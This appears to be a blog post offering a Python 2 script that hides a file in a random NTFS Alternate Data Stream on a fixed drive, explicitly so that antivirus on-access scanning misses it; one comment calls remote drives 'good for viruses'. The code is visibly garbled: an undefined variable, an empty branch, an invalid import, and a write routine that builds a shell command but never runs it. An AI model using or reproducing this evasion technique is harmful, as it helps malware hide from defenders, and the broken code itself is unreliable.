______ Y ______

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Tag Archives: evasion

Alternate Data Streams File Hider In Python

Alternate Data Streams (ADS) is a nice little feature in NTFS system that practically allows to hide the files in one of the ‘streams’ mandatory supported by NTFS system. In practice, there are not many anty-viruses that check such streams thus it may be sometimes handy to lunch a new process from the ADS that wont be picked up by ‘on-access’ scan engine. The code below will use windows API ( kernel32.dll again ) to find static drives and write a file to ADS.

Steps to follow:
1) Enumerate all the partitions
2) Check for static drive
3) Get the list of first 1000 files
4) Select 1 of the files from the list
5) Use it to write to ADS

NOTE: ADS does not survive compression or many other file operations so once put in place it can be only copied to other locations

print "[+] Advance Data Stream Hider by Y"
print "[+] Will hide selected file in random ADS on the writable drive"
print "[+] contact : If you know me then give me a shout"
print "[+] usage: ./ads_hide.py <FILE_PATH>"
print "\n"

# define imports
import ctypes
import os 
import random
import stat
import string
import sys.argv

#define kernel32 dll
kernel32 = ctypes.windll.kernel32

def getDrives():
    print "[+] Enumerating the list of current partitions"
    partition_list = list()
    for drives in range(1,26):
        mask=1 << drives
        if drivebits & mask:
                drive_letter='%c:\\' % chr(ord('A')+drives)
                print "\t[+]Found drive: %s" % drive_letter
    return partition_list

def getDriveInfo(drives):
    clean_list = list()
    for dx in drives:
        t = kernel32.GetDriveTypeA(dx)
        if t == 3:
            print "\t[+] Found Fixed Drive : " , dx
            # if we have DRIVE_FIXED
        elif t == 4: # its DRIVE_REMOTE # <- this is good for viruses
            # dont append any other type of drive
    return clean_list

def genRandomPath(drive):
    # enumerate and return random path from the drive ( limit to 1000 possible variants for speed )
    counter = 0
    list_dirs = list()
    for dirname, dirnames, filenames in os.walk(drive):
        for nm in filenames:
            list_dirs.append(os.path.join(dirname, nm))
            counter +=1
            if counter == 1000:
                return list_dirs

def getRandomDrive(list_writable_drives):
    print "[+] Selecting Partition"
    size = len(list_writable_drives)
    int = random.randrange(0,size)
    return list_writable_drives[int]

def selectRandomPath(limit,list):
    print "[+] Choosing $PATH"
    int = random.randrange(0,limit)
    return list[int]

def isFileWritable(filepath):
    print "[+] Checking File Write Permission"
    st = os.stat(filepath)
    return bool(st.st_mode & stat.S_IWGRP )

def write(file,path):
    filename,extension = str(file).split(".")
    name = ''.join(random.choice(string.ascii_uppercase + string.digits + string.lowercase) for x in range(random.randrange(4,20)))
    const = str(name)+"."+str(extension)
    command = "type %s > %s:%s" % (file,path,const)
    l = str(path)+":"+str(const)
    print "[+] File Hidden In: %s" % l

    drives =  getDrives()
    print "[+] Checking Drive Type"
    list_to_write = getDriveInfo(drives)
    drive_to_search =  getRandomDrive(list_to_write)
    print "[+] Constructing ADS"
    # first attempt to get files
    path = selectRandomPath(1000,genRandomPath(drive_to_search))
    # check permissions on the file
    if (isFileWritable(path) == True):
        print "[+] Writing to ADS"
        # select another path from the list 
        path = selectRandomPath(1000,genRandomPath(drive_to_search))
        print "[+] Writing to ADS"

FILE = str(sys.argv[1])

Again, this code is here only for the educational purposes.